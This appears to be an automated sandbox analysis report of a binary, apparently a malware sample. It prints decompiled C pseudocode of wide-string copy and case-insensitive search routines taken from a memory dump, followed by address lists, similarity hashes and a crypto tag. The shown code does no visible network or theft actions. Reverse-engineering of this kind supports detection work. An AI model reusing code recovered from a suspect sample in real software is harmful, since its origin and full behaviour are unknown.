																	_t397 = (_t397 >> 1) + _t306;
																	goto L104;
																}
																__eflags = _t385;
																_t397 = 0;
																if(_t385 != 0) {
																	goto L101;
																}
																_v32 = _t262;
																_t306 = _t444;
																while(1) {
																	__eflags =  *(_t434 + _t397 * 2) & 0x0000ffff;
																	if(( *(_t434 + _t397 * 2) & 0x0000ffff) == 0) {
																		break;
																	}
																	_t397 = _t397 + 1;
																	__eflags = _t397 - _t444;
																	if(_t397 < _t444) {
																		continue;
																	}
																	_t262 = _v32;
																	goto L97;
																}
																_t262 = _v32;
																goto L104;
															}
															_t431 = _t431 + 1;
															__eflags = _t431 - _v60;
															if(_t431 < _v60) {
																continue;
															}
															goto L89;
														}
														_t310 = _v68;
														_t448 = _v64;
														_t389 = _v44;
														_t433 = _t350 + 2;
														__eflags = _t433;
														if(_t433 == 0) {
															goto L53;
														}
														__eflags =  *(_t350 + 2) & 0x0000ffff;
														if(( *(_t350 + 2) & 0x0000ffff) == 0) {
															goto L53;
														}
														_v68 = _t310;
														_t261 = 0;
														__eflags = 0;
														_v64 = _t448;
														_v44 = _t389;
														_v40 = _t350;
														while(1) {
															_t261 = _t261 + 1;
															_t348 = _v40 + _t261 * 2;
															_t390 =  *_t348 & 0x0000ffff;
															__eflags = ( *(_t433 + _t261 * 2 - 2) & 0x0000ffff) + 0xffffffbf - 0x19;
															_t391 =  <=  ? _t390 + 0x20 : _t390;
															__eflags = ( <=  ? _t390 + 0x20 : _t390) - _v56;
															if(( <=  ? _t390 + 0x20 : _t390) == _v56) {
																break;
															}
															__eflags =  *(_t433 + _t261 * 2) & 0x0000ffff;
															if(( *(_t433 + _t261 * 2) & 0x0000ffff) != 0) {
																continue;
															}
															goto L53;
														}
														_t306 = _v68;
														_t444 = _v64;
														_t385 = _v44;
														goto L69;
													}
													_v36 = _t436;
													_t350 = _v40;
													L162:
													__eflags = _t257;
													if(__eflags == 0) {
														goto L83;
													}
													if(__eflags > 0) {
														goto L84;
													}
													_t262 = _v32;
													_t434 = _v36;
													goto L90;
												}
												_v40 = _t348;
												_t430 = _t444;
												_v44 = _t385;
												_t364 = _v36;
												while(1) {
													__eflags =  *(_t364 + _t257 * 2) & 0x0000ffff;
													if(( *(_t364 + _t257 * 2) & 0x0000ffff) == 0) {
														break;
													}
													_t257 = _t257 + 1;
													__eflags = _t257 - _t444;
													if(_t257 < _t444) {
														continue;
													}
													_v36 = _t364;
													_t385 = _v44;
													_t348 = _v40;
													goto L75;
												}
												_v36 = _t364;
												_t386 = _v44;
												_t350 = _v40;
												goto L162;
												L75:
												_v40 = _t348;
												_t254 =  ~( ~_t430 + 0x00000007 & 0x00000007) + 0x7fffffff;
												__eflags = _t254;
												_v44 = _t385;
												_t349 = _v36;
												while(1) {
													asm("movdqu xmm1, [ecx+edi*2]");
													asm("pcmpeqw xmm1, xmm0");
													asm("pmovmskb edx, xmm1");
													__eflags = _t385;
													if(_t385 != 0) {
														break;
													}
													_t430 = _t430 + 8;
													__eflags = _t430 - _t254;
													if(_t430 < _t254) {
														continue;
													}
													_v36 = _t349;
													_t386 = _v44;
													_t350 = _v40;
													__eflags = _t254 - 0x7fffffff;
													if(_t254 >= 0x7fffffff) {
														goto L83;
													}
													goto L79;
												}
												asm("bsf eax, eax");
												_v36 = _t349;
												_t257 = (_t385 >> 1) + _t430;
												_t386 = _v44;
												_t350 = _v40;
												goto L162;
											}
										}
										goto L40;
									}
									_t290 =  *_t339 & 0x0000ffff;
									 *_t373 = _t290;
									__eflags = _t290;
									if(_t290 == 0) {
										goto L34;
									}
									_v68 = _t438;
									_t291 = 0;
									__eflags = 0;
									while(1) {
										_t291 = _t291 + 1;
										_t456 =  *(_t339 + _t291 * 4 - 2) & 0x0000ffff;
										 *(_t373 + _t291 * 4 - 2) = _t456;
										__eflags = _t456;
										if(_t456 == 0) {
											break;
										}
										_t457 =  *(_t339 + _t291 * 4) & 0x0000ffff;
										 *(_t373 + _t291 * 4) = _t457;
										__eflags = _t457;
										if(_t457 != 0) {
											continue;
										}
										break;
									}
									_t438 = _v68;
									goto L34;
								}
							}
							_t373 = _v52;
							goto L37;
						}
						_t293 = _t422 & 0x0000000f;
						__eflags = _t293;
						if(_t293 == 0) {
							L16:
							asm("pxor xmm0, xmm0");
							_t335 =  ~( ~_t293 + 0x00000007 & 0x00000007) + 0x7fffffff;
							__eflags = _t335;
							while(1) {
								asm("movdqu xmm1, [edi+eax*2]");
								asm("pcmpeqw xmm1, xmm0");
								asm("pmovmskb edx, xmm1");
								__eflags = _t367;
								if(_t367 != 0) {
									break;
								}
								_t293 = _t293 + 8;
								__eflags = _t293 - _t335;
								if(_t293 < _t335) {
									continue;
								}
								__eflags = _t335 - 0x7fffffff;
								if(_t335 >= 0x7fffffff) {
									L22:
									_t338 = 0x40;
									_t300 = 0x7fffffff;
									goto L23;
								} else {
									goto L20;
								}
								while(1) {
									L20:
									__eflags =  *(_t422 + _t335 * 2) & 0x0000ffff;
									if(( *(_t422 + _t335 * 2) & 0x0000ffff) == 0) {
										break;
									}
									_t335 = _t335 + 1;
									__eflags = _t335 - 0x7fffffff;
									if(_t335 < 0x7fffffff) {
										continue;
									}
									goto L22;
								}
								L63:
								__eflags = _t300 - 0xfffffffe;
								if(_t300 != 0xfffffffe) {
									_t338 = 0x40;
								} else {
									 *_t422 = 0;
									_t338 = _v48;
								}
								goto L23;
							}
							asm("bsf ebx, edx");
							_t300 = (_t335 >> 1) + _t293;
							goto L63;
						}
						_t335 = 0;
						__eflags = _t293 & 0x00000001;
						if((_t293 & 0x00000001) != 0) {
							goto L20;
						}
						_t293 =  ~_t293 + 0x10 >> 1;
						__eflags = _t293;
						while(1) {
							_t367 =  *(_t422 + _t335 * 2) & 0x0000ffff;
							__eflags = _t367;
							if(_t367 == 0) {
								goto L63;
							}
							_t335 = _t335 + 1;
							__eflags = _t335 - _t293;
							if(_t335 < _t293) {
								continue;
							}
							goto L16;
						}
						goto L63;
					}
					_t231 =  &_v52;
					goto L38;
				}
				if(_t422 == 0) {
					L6:
					_push(2);
					_push(_t217);
					E008A10B0();
					_t461 = _t461 + 8;
					goto L8;
				}
				_t367 =  *_t217 & 0x0000ffff;
				 *_t422 = _t367;
				if(_t367 == 0) {
					goto L6;
				}
				while(1) {
					_t367 = 1;
					_t365 = _t217[1] & 0x0000ffff;
					 *(_t422 + 2) = _t365;
					if(_t365 == 0) {
						goto L6;
					}
					_t366 = _t217[2] & 0x0000ffff;
					 *(_t422 + 4) = _t366;
					if(_t366 != 0) {
						continue;
					}
					goto L6;
				}
				goto L6;
			}

0x008ab6fe
0x008ab702
0x008ab704
0x008ab708
0x008ab712
0x008ab714
0x008ab717
0x008ab71d
0x008ab757
0x008ab759
0x008ab75c
0x008ab760
0x008ab768
0x008ab76e
0x008ab779
0x008ab77b
0x008abf3a
0x008abf3f
0x008ab7ff
0x008ab804
0x008ab804
0x008ab807
0x008ab80a
0x008ab80d
0x008ab80f
0x008ab824
0x008ab827
0x008ab827
0x008ab82d
0x008ab835
0x008ab835
0x008ab835
0x008ab836
0x008ab840
0x008ab847
0x008ab848
0x008ab850
0x008ab852
0x008ab855
0x008ab859
0x008ab85b
0x008ab8a3
0x008ab8a5
0x00000000
0x008ab85d
0x008ab85d
0x008ab85f
0x008ab88e
0x008ab88e
0x008ab890
0x008ab891
0x008ab895
0x008ab89a
0x008ab89e
0x008ab8a8
0x008ab8a8
0x008ab8ac
0x008ab8b0
0x008ab8b4
0x008ab8b8
0x008ab8be
0x008ab8c2
0x008ab8c7
0x008ab8c7
0x008ab8cb
0x008ab8d4
0x008ab8d4
0x008ab8d9
0x008ab8de
0x008ab8e0
0x008ab8e8
0x008ab8ea
0x008ab8f0
0x008ab8f4
0x008ab933
0x008ab9e2
0x008ab9e2
0x008ab9e5
0x008ab9e7
0x008ab9ee
0x008ab9ee
0x008ab9f0
0x008ab9f4
0x008ab9fe
0x008aba02
0x008aba12
0x008aba12
0x008ab8f8
0x008ab921
0x008ab921
0x008ab923
0x008ab924
0x008ab929
0x00000000
0x008ab929
0x008ab8fa
0x008ab8fd
0x008ab902
0x00000000
0x00000000
0x008ab904
0x008ab906
0x008ab906
0x008ab907
0x008ab90c
0x008ab913
0x00000000
0x00000000
0x008ab915
0x008ab919
0x008ab91f
0x00000000
0x00000000
0x00000000
0x008ab91f
0x00000000
0x008ab906
0x008ab8cd
0x008ab8d2
0x008ab93b
0x008ab93d
0x008ab93f
0x008ab983
0x008ab983
0x008ab988
0x008ab98d
0x008ab98f
0x008ab997
0x008ab999
0x008ab99f
0x008ab9a1
0x008ab9a3
0x008ab9dd
0x008ab9df
0x00000000
0x008ab9df
0x008ab9a5
0x008ab9a7
0x008ab9d0
0x008ab9d0
0x008ab9d2
0x008ab9d3
0x008ab9d8
0x00000000
0x008ab9d8
0x008ab9a9
0x008ab9ac
0x008ab9af
0x008ab9b1
0x00000000
0x00000000
0x008ab9b3
0x008ab9b3
0x008ab9b5
0x008ab9b5
0x008ab9b6
0x008ab9bb
0x008ab9c0
0x008ab9c2
0x00000000
0x00000000
0x008ab9c4
0x008ab9c8
0x008ab9cc
0x008ab9ce
0x00000000
0x00000000
0x00000000
0x008ab9ce
0x00000000
0x008ab9b5
0x008ab944
0x008ab946
0x00000000
0x00000000
0x008ab948
0x008ab94c
0x008ab94f
0x008ab952
0x008ab955
0x008ab958
0x008ab958
0x008ab95a
0x008ab95d
0x008ab961
0x008ab961
0x008ab965
0x008ab968
0x008ab96b
0x008ab96e
0x008ab971
0x008ab974
0x00000000
0x00000000
0x008ab97a
0x008ab97f
0x008ab981
0x00000000
0x00000000
0x00000000
0x008ab981
0x008aba32
0x008aba36
0x008aba39
0x008aba3b
0x00000000
0x00000000
0x008aba43
0x008aba46
0x008aba50
0x008aba56
0x008aba58
0x008aba5c
0x008aba6d
0x008aba6d
0x008aba6d
0x008aba6f
0x008aba71
0x00000000
0x00000000
0x008aba73
0x008aba75
0x008aba77
0x008abaf0
0x008abaf0
0x008abaf4
0x008abaf8
0x008abafc
0x008abafe
0x00000000
0x00000000
0x008abb04
0x008abb05
0x008abb0a
0x00000000
0x00000000
0x008abb0c
0x008abb10
0x008abb14
0x008abb14
0x008abb19
0x008abb19
0x008abb1d
0x008abb1d
0x008abb1f
0x008abb22
0x008abb26
0x008abb2a
0x008abb2a
0x008abb35
0x008abb39
0x008abb3f
0x008abb42
0x008abb48
0x008abb4e
0x008abb51
0x008abb54
0x00000000
0x00000000
0x008abb60
0x008abb62
0x008abb6b
0x008abb6b
0x008abb6e
0x008abb72
0x008abb76
0x008abb7a
0x008abb7e
0x008abb7e
0x008abb80
0x00000000
0x00000000
0x008abb86
0x008abb88
0x008abbae
0x008abbba
0x008abbba
0x008abbc0
0x008abbc0
0x008abbc5
0x008abbc9
0x008abbcd
0x008abbcf
0x00000000
0x00000000
0x008abbd5
0x008abbd8
0x008abbda
0x00000000
0x00000000
0x008abbdc
0x008abbe2
0x008abbf5
0x008abbf5
0x008abbfa
0x008abbfc
0x008abbfc
0x008abbff
0x008abc1f
0x008abc2b
0x008abc2b
0x008abc31
0x008abc31
0x008abc36
0x008abc3a
0x008abc3e
0x008abc40
0x00000000
0x00000000
0x008abc46
0x008abc49
0x008abc4b
0x00000000
0x00000000
0x008abc4d
0x008abc53
0x008abc66
0x008abc66
0x008abc6b
0x008abc6f
0x008abc73
0x008abc75
0x008abc78
0x008abc7a
0x008abc7d
0x008abc7f
0x008abc82
0x008abc85
0x008abc87
0x008abc8a
0x008abc8c
0x008abde2
0x008abde2
0x008abdec
0x008abdee
0x008abdf4
0x008abdf6
0x008abdf8
0x008abe37
0x00000000
0x008abe37
0x008abdfa
0x008abdfc
0x008abe25
0x008abe25
0x008abe27
0x008abe28
0x008abe2d
0x00000000
0x008abe2d
0x008abdfe
0x008abe01
0x008abe04
0x008abe06
0x00000000
0x00000000
0x008abe08
0x008abe08
0x008abe0a
0x008abe0a
0x008abe0b
0x008abe10
0x008abe15
0x008abe17
0x00000000
0x00000000
0x008abe19
0x008abe1d
0x008abe21
0x008abe23
0x00000000
0x00000000
0x00000000
0x008abe23
0x00000000
0x008abe0a
0x008abc92
0x008abc95
0x008abc97
0x00000000
0x00000000
0x008abc9d
0x008abc9f
0x008abd0f
0x008abd14
0x008abd14
0x008abd17
0x008abd1a
0x008abd1d
0x008abd1f
0x008abd32
0x008abd35
0x008abd35
0x008abd3b
0x008abd43
0x008abd43
0x008abd43
0x008abd44
0x008abd4e
0x008abd58
0x008abd5b
0x008abd61
0x008abd63
0x008abd69
0x008abd6b
0x008abd6d
0x008abda7
0x008abda9
0x00000000
0x008abd6f
0x008abd6f
0x008abd71
0x008abd9a
0x008abd9a
0x008abd9c
0x008abd9d
0x008abda2
0x008abdac
0x008abdac
0x008abdb2
0x008abdb5
0x008abdb7
0x008abdb7
0x008abdb9
0x00000000
0x00000000
0x008abdbf
0x008abdc9
0x008abdc9
0x008abdcc
0x008abdcd
0x008abdd0
0x008abdd2
0x00000000
0x00000000
0x008abdd4
0x008abdd6
0x008abe4a
0x00000000
0x008abe4a
0x008abdd8
0x008abdd8
0x008abdda
0x00000000
0x00000000
0x008abdc3
0x008abdc6
0x008abdc6
0x008abdc6
0x008abdc9
0x008abd73
0x008abd76
0x008abd79
0x008abd7b
0x00000000
0x00000000
0x008abd7d
0x008abd7d
0x008abd7f
0x008abd7f
0x008abd80
0x008abd85
0x008abd8a
0x008abd8c
0x00000000
0x00000000
0x008abd8e
0x008abd92
0x008abd96
0x008abd98
0x00000000
0x00000000
0x00000000
0x008abd98
0x00000000
0x008abd7f
0x008abd6d
0x008abd21
0x00000000
0x008abd21
0x008abca3
0x008abca3
0x008abca6
0x008abcc3
0x008abccf
0x008abccf
0x008abcd5
0x008abcd5
0x008abcda
0x008abcde
0x008abce2
0x008abce4
0x00000000
0x00000000
0x008abcea
0x008abced
0x008abcef
0x00000000
0x00000000
0x008abcf1
0x008abcf7
0x008abd0a
0x008abd0a
0x00000000
0x00000000
0x00000000
0x00000000
0x008abcf9
0x008abcf9
0x008abcfd
0x008abcff
0x00000000
0x00000000
0x008abd01
0x008abd02
0x008abd08
0x00000000
0x00000000
0x00000000
0x008abd08
0x00000000
0x008abcf9
0x008abe7a
0x008abe7f
0x00000000
0x008abe7f
0x008abca8
0x008abcaa
0x008abcad
0x00000000
0x00000000
0x008abcb4
0x008abcb4
0x008abcb6
0x008abcb6
0x008abcba
0x008abcbc
0x00000000
0x00000000
0x008abcbe
0x008abcbf
0x008abcc1
0x00000000
0x00000000
0x00000000
0x008abcc1
0x00000000
0x00000000
0x00000000
0x00000000
0x008abc55
0x008abc55
0x008abc59
0x008abc5b
0x00000000
0x00000000
0x008abc5d
0x008abc5e
0x008abc64
0x00000000
0x00000000
0x00000000
0x008abc64
0x00000000
0x008abc55
0x008abe86
0x008abe8b
0x00000000
0x008abe8b
0x008abc01
0x008abc03
0x008abc09
0x00000000
0x00000000
0x008abc10
0x008abc10
0x008abc12
0x008abc12
0x008abc16
0x008abc18
0x00000000
0x00000000
0x008abc1a
0x008abc1b
0x008abc1d
0x00000000
0x00000000
0x00000000
0x008abc1d
0x00000000
0x00000000
0x00000000
0x00000000
0x008abbe4
0x008abbe4
0x008abbe8
0x008abbea
0x00000000
0x00000000
0x008abbec
0x008abbed
0x008abbf3
0x00000000
0x00000000
0x00000000
0x008abbf3
0x00000000
0x008abbe4
0x008abe92
0x008abe97
0x00000000
0x008abe97
0x008abb8a
0x008abb8c
0x008abb91
0x00000000
0x00000000
0x008abb93
0x008abb97
0x008abb99
0x008abb9d
0x008abb9f
0x00000000
0x00000000
0x008abba5
0x008abba6
0x008abba8
0x00000000
0x00000000
0x008abbaa
0x00000000
0x008abbaa
0x008abe3f
0x00000000
0x008abe3f
0x008abb64
0x008abb65
0x008abb69
0x00000000
0x00000000
0x00000000
0x008abb69
0x008abe9e
0x008abea1
0x008abea5
0x008abeab
0x008abeab
0x008abeae
0x00000000
0x00000000
0x008abeb8
0x008abeba
0x00000000
0x00000000
0x008abec0
0x008abec3
0x008abec3
0x008abec5
0x008abec9
0x008abecd
0x008abed1
0x008abed1
0x008abedb
0x008abede
0x008abee4
0x008abeee
0x008abef1
0x008abef4
0x00000000
0x00000000
0x008abefe
0x008abf00
0x00000000
0x00000000
0x00000000
0x008abf02
0x008aba62
0x008aba65
0x008aba69
0x00000000
0x008aba69
0x008abf07
0x008abf0b
0x008abe5f
0x008abe5f
0x008abe61
0x00000000
0x00000000
0x008abe67
0x00000000
0x00000000
0x008abe6d
0x008abe71
0x00000000
0x008abe71
0x008aba79
0x008aba7d
0x008aba7f
0x008aba83
0x008aba87
0x008aba8b
0x008aba8d
0x00000000
0x00000000
0x008aba93
0x008aba94
0x008aba96
0x00000000
0x00000000
0x008aba98
0x008aba9c
0x008abaa0
0x00000000
0x008abaa0
0x008abe53
0x008abe57
0x008abe5b
0x00000000
0x008abaa4
0x008abab0
0x008abab4
0x008abab4
0x008abab9
0x008ababd
0x008abac1
0x008abac1
0x008abac6
0x008abaca
0x008abace
0x008abad0
0x00000000
0x00000000
0x008abad6
0x008abad9
0x008abadb
0x00000000
0x00000000
0x008abadd
0x008abae1
0x008abae5
0x008abae9
0x008abaee
0x00000000
0x00000000
0x00000000
0x008abaee
0x008abf16
0x008abf1b
0x008abf1f
0x008abf21
0x008abf25
0x00000000
0x008abf25
0x008aba6d
0x00000000
0x008ab8d2
0x008ab861
0x008ab864
0x008ab867
0x008ab869
0x00000000
0x00000000
0x008ab86b
0x008ab86e
0x008ab86e
0x008ab870
0x008ab870
0x008ab871
0x008ab876
0x008ab87b
0x008ab87d
0x00000000
0x00000000
0x008ab87f
0x008ab883
0x008ab887
0x008ab889
0x00000000
0x00000000
0x00000000
0x008ab889
0x008ab88b
0x00000000
0x008ab88b
0x008ab85b
0x008ab811
0x00000000
0x008ab811
0x008ab783
0x008ab783
0x008ab786
0x008ab7a6
0x008ab7aa
0x008ab7b6
0x008ab7b6
0x008ab7bc
0x008ab7bc
0x008ab7c1
0x008ab7c5
0x008ab7c9
0x008ab7cb
0x00000000
0x00000000
0x008ab7d1
0x008ab7d4
0x008ab7d6
0x00000000
0x00000000
0x008ab7d8
0x008ab7de
0x008ab7f5
0x008ab7f5
0x008ab7fa
0x00000000
0x00000000
0x00000000
0x00000000
0x008ab7e0
0x008ab7e0
0x008ab7e4
0x008ab7e6
0x00000000
0x00000000
0x008ab7ec
0x008ab7ed
0x008ab7f3
0x00000000
0x00000000
0x00000000
0x008ab7f3
0x008aba15
0x008aba15
0x008aba18
0x008aba28
0x008aba1a
0x008aba1c
0x008aba1f
0x008aba1f
0x00000000
0x008aba18
0x008abf2e
0x008abf33
0x00000000
0x008abf33
0x008ab788
0x008ab78a
0x008ab78c
0x00000000
0x00000000
0x008ab793
0x008ab793
0x008ab795
0x008ab795
0x008ab799
0x008ab79b
0x00000000
0x00000000
0x008ab7a1
0x008ab7a2
0x008ab7a4
0x00000000
0x00000000
0x00000000
0x008ab7a4
0x00000000
0x008ab795
0x008ab770
0x00000000
0x008ab770
0x008ab721
0x008ab74a
0x008ab74a
0x008ab74c
0x008ab74d
0x008ab752
0x00000000
0x008ab752
0x008ab723
0x008ab726
0x008ab72b
0x00000000
0x00000000
0x008ab72f
0x008ab72f
0x008ab730
0x008ab735
0x008ab73c
0x00000000
0x00000000
0x008ab73e
0x008ab742
0x008ab748
0x00000000
0x00000000
0x00000000
0x008ab748
0x00000000

Strings

@, xrefs: 008AB760

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 0beef277e831ee5b6f040fee2b591ecf537cd5d41fbc7949637f2daeaf3f676f
Instruction ID: 1ada3d4278877d6b54381b7b73bb99e849119134b992575d2b2f02e932a6239b
Opcode Fuzzy Hash: 0beef277e831ee5b6f040fee2b591ecf537cd5d41fbc7949637f2daeaf3f676f
Instruction Fuzzy Hash: 15321575A047168BE7248F29C48163AB2E2FFD6310F28862DE991C7B96FB74DC51C391

Uniqueness

Uniqueness Score: -1.00%

Function 008AA660, Relevance: 1.9, Strings: 1, Instructions: 690
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E008AA660(signed int __ecx, void* __eflags, signed int* _a4, signed int _a8) {
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				void* _t219;
				signed int _t220;
				signed int _t221;
				signed int _t224;
				signed short** _t227;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t237;
				signed int _t238;
				signed int _t240;
				unsigned int _t242;
				signed int _t248;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t260;
				signed int _t263;
				signed int _t264;
				unsigned int _t270;
				signed int _t271;
				signed int _t273;
				signed int _t280;
				signed int _t281;
				signed int _t283;
				signed int _t284;
				signed int _t288;
				signed int _t293;
				signed int _t294;
				signed int _t296;
				signed int _t299;
				signed int _t300;
				signed int _t302;
				signed int _t309;
				signed int _t312;
				unsigned int _t318;
				signed int _t319;
				signed int _t321;
				signed short* _t323;
				signed int _t324;
				signed int _t325;
				unsigned int _t326;
				signed int _t331;
				signed int _t333;
				signed int _t335;
				signed int _t336;
				signed int _t337;
				signed int _t338;
				signed short* _t344;
				signed int _t345;
				signed short* _t346;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				signed int _t350;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				signed int _t356;
				signed int _t362;
				unsigned int _t363;
				signed int _t365;
				signed int _t366;
				signed int _t367;
				void* _t369;
				signed int _t370;
				signed int _t371;
				signed int _t376;
				signed int _t378;
				signed int _t382;
				signed int _t386;
				signed int _t387;
				signed int _t395;
				signed int _t398;
				signed int _t399;
				signed int _t403;
				signed int _t404;
				signed int _t406;
				signed int _t407;
				signed int _t414;
				signed int _t415;
				signed int _t417;
				signed int _t418;
				signed int _t421;
				signed int* _t422;
				signed int _t425;
				signed int _t428;
				signed int _t432;
				signed int _t434;
				signed int _t438;
				signed int _t439;
				signed int _t440;
				signed int _t441;
				signed int _t444;
				void* _t447;

				_t312 = __ecx;
				_t296 = 0;
				_v40 = 0;
				_t398 = __ecx;
				_v36 = 0;
				_push(0x80);
				_t417 = E008A1030();
				_t447 = (_t444 & 0xfffffff0) - 0x34 + 4;
				_t344 = _v40;
				if(_t344 == 0) {
					 *_t417 = 0;
					L8:
					_v36 = 0x40;
					_v40 = _t417;
					if((_a8 & 0x0000ffff) != 0) {
						__eflags = _t417;
						if(_t417 == 0) {
							_t418 = 0x40;
							_t345 = _t296;
							L23:
							_t24 = _t345 + 2; // -2147483652
							_t219 = _t24;
							__eflags = _t219 - 0x40;
							_t220 =  <=  ? 0x40 : _t219;
							__eflags = _t418 - _t220;
							if(_t418 < _t220) {
								_t318 = (_t220 >> 5 >> 0x1a) + _t220 >> 6;
								_t221 = _t220 & 0x8000003f;
								__eflags = _t221;
								if(_t221 < 0) {
									_t221 = (_t221 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t221;
								}
								__eflags = _t221;
								_t319 = _t318 + (_t296 & 0xffffff00 | _t221 > 0x00000000);
								_v64 = _t319 << 6;
								_push(_t319 << 7);
								_v60 = _t345;
								_t224 = E008A1030();
								_t345 = _v60;
								_t421 = _t224;
								_t447 = _t447 + 4;
								_t321 = _v40;
								__eflags = _t321;
								if(_t321 == 0) {
									 *_t421 = _t296;
									goto L36;
								} else {
									__eflags = _t421;
									if(_t421 == 0) {
										L34:
										_push(2);
										_push(_t321);
										_v60 = _t345;
										E008A10B0();
										_t345 = _v60;
										_t447 = _t447 + 8;
										L36:
										_v36 = _v64;
										_v40 = _t421;
										L37:
										 *((short*)(_t421 + _t345 * 2)) = _a8 & 0x0000ffff;
										_t227 =  &_v40;
										 *( *_t227 + 2 + _t345 * 2) = _t296;
										L38:
										_t346 =  *_t227;
										_t422 = _a4;
										if(_t346 == 0) {
											L40:
											_push(0x80);
											 *_t422 = _t296;
											_t422[1] = _t296;
											_t399 = E008A1030();
											_t447 = _t447 + 4;
											_t323 =  *_t422;
											if(_t323 == 0) {
												 *_t399 = _t296;
												L62:
												 *_t422 = _t399;
												_t422[1] = 0x40;
												L63:
												_push(2);
												_push(_v40);
												E008A10B0();
												_v40 = _t296;
												_v36 = _t296;
												return _t422;
											}
											if(_t399 == 0) {
												L46:
												_push(2);
												_push(_t323);
												E008A10B0();
												_t447 = _t447 + 8;
												goto L62;
											}
											_t347 =  *_t323 & 0x0000ffff;
											 *_t399 = _t347;
											if(_t347 == 0) {
												goto L46;
											}
											_t348 = _t296;
											while(1) {
												_t348 = _t348 + 1;
												_t232 =  *(_t323 + _t348 * 4 - 2) & 0x0000ffff;
												 *(_t399 + _t348 * 4 - 2) = _t232;
												if(_t232 == 0) {
													goto L46;
												}
												_t233 =  *(_t323 + _t348 * 4) & 0x0000ffff;
												 *(_t399 + _t348 * 4) = _t233;
												if(_t233 != 0) {
													continue;
												}
												goto L46;
											}
											goto L46;
										}
										_t234 =  *_t346 & 0x0000ffff;
										if(_t234 != 0) {
											_t324 =  *_t398;
											__eflags = _t324;
											if(_t324 == 0) {
												L54:
												_push(0x80);
												 *_t422 = _t296;
												_t422[1] = _t296;
												_t399 = E008A1030();
												_t447 = _t447 + 4;
												_t325 =  *_t422;
												__eflags = _t325;
												if(_t325 == 0) {
													 *_t399 = _t296;
													goto L62;
												}
												__eflags = _t399;
												if(_t399 == 0) {
													L60:
													_push(2);
													_push(_t325);
													E008A10B0();
													_t447 = _t447 + 8;
													goto L62;
												}
												_t349 =  *_t325 & 0x0000ffff;
												 *_t399 = _t349;
												__eflags = _t349;
												if(_t349 == 0) {
													goto L60;
												}
												_t350 = _t296;
												while(1) {
													_t350 = _t350 + 1;
													_t237 =  *(_t325 + _t350 * 4 - 2) & 0x0000ffff;
													 *(_t399 + _t350 * 4 - 2) = _t237;
													__eflags = _t237;
													if(_t237 == 0) {
														goto L60;
													}
													_t238 =  *(_t325 + _t350 * 4) & 0x0000ffff;
													 *(_t399 + _t350 * 4) = _t238;
													__eflags = _t238;
													if(_t238 != 0) {
														continue;
													}
													goto L60;
												}
												goto L60;
											}
											__eflags =  *_t324 & 0x0000ffff;
											if(( *_t324 & 0x0000ffff) == 0) {
												goto L54;
											}
											_v32 = _t346;
											__eflags = _t234 - 0x41 - 0x19;
											_t239 =  <=  ? _t234 + 0x20 : _t234;
											_t403 = _t296;
											_t240 = ( <=  ? _t234 + 0x20 : _t234) & 0x0000ffff;
											_v48 = _t240;
											while(1) {
												_t425 =  *(_t324 + _t403 * 2) & 0x0000ffff;
												__eflags = _t425 - 0x41 - 0x19;
												_t426 =  <=  ? _t425 + 0x20 : _t425;
												__eflags = ( <=  ? _t425 + 0x20 : _t425) - _t240;
												if(( <=  ? _t425 + 0x20 : _t425) == _t240) {
													break;
												}
												_t403 = _t403 + 1;
												__eflags =  *(_t324 + _t403 * 2) & 0x0000ffff;
												if(( *(_t324 + _t403 * 2) & 0x0000ffff) != 0) {
													continue;
												}
												L53:
												_t422 = _a4;
												_t296 = 0;
												__eflags = 0;
												goto L54;
											}
											_t352 = _v32;
											_t404 = _t324 + _t403 * 2;
											_t422 = _a4;
											_t296 = 0;
											__eflags = _t404;
											if(_t404 == 0) {
												goto L54;
											}
											_t428 = _t352 & 0x0000000f;
											asm("pxor xmm0, xmm0");
											_v64 = _t428;
											_t242 = _t428 & 0x00000001;
											_v52 = _t242;
											_v56 =  ~_t428 + 0x10 >> 1;
											_v60 = _t324;
											_v32 = _t352;
											_t432 = _v64;
											_t299 = _v56;
											_t326 = _t242;
											while(1) {
												L70:
												_t353 = _t432;
												__eflags = _t432;
												if(_t432 == 0) {
													goto L76;
												}
												_t251 = 0;
												__eflags = _t326;
												if(_t326 != 0) {
													L80:
													_t333 = _v32;
													while(1) {
														__eflags =  *(_t333 + _t251 * 2) & 0x0000ffff;
														if(( *(_t333 + _t251 * 2) & 0x0000ffff) == 0) {
															break;
														}
														_t251 = _t251 + 1;
														__eflags = _t251 - 0x7fffffff;
														if(_t251 < 0x7fffffff) {
															continue;
														}
														_v32 = _t333;
														L84:
														_t251 = 0x7fffffff;
														L85:
														_v68 = _t251;
														_t354 = 0;
														__eflags = 0;
														while(1) {
															_t302 =  *(_t404 + _t354 * 2) & 0x0000ffff;
															_t434 =  *(_v32 + _t354 * 2) & 0x0000ffff;
															__eflags = _t302 - 0x61 - 0x19;
															_t303 =  <=  ? _t302 - 0x20 : _t302;
															_t253 = ( <=  ? _t302 - 0x20 : _t302) & 0x0000ffff;
															__eflags = _t434 - 0x61 - 0x19;
															_t435 =  <=  ? _t434 - 0x20 : _t434;
															__eflags = _t253 - ( <=  ? _t434 - 0x20 : _t434);
															if(__eflags < 0 || __eflags > 0) {
																break;
															}
															__eflags = _t253;
															if(_t253 == 0) {
																L90:
																_t335 = _v60;
																_t296 = 0;
																_t422 = _a4;
																__eflags = _t404;
																if(_t404 == 0) {
																	goto L54;
																}
																_t406 = _t404 - _t335;
																__eflags = _t406;
																_t407 = _t406 >> 1;
																if(_t406 != 0) {
																	_t257 = _t335 & 0x0000000f;
																	__eflags = _t257;
																	if(_t257 == 0) {
																		L106:
																		_t362 =  ~( ~_t257 + 0x00000007 & 0x00000007) + 0x7fffffff;
																		__eflags = _t362;
																		while(1) {
																			asm("movdqu xmm1, [ecx+eax*2]");
																			asm("pcmpeqw xmm1, xmm0");
																			asm("pmovmskb ebx, xmm1");
																			__eflags = _t296;
																			if(_t296 != 0) {
																				break;
																			}
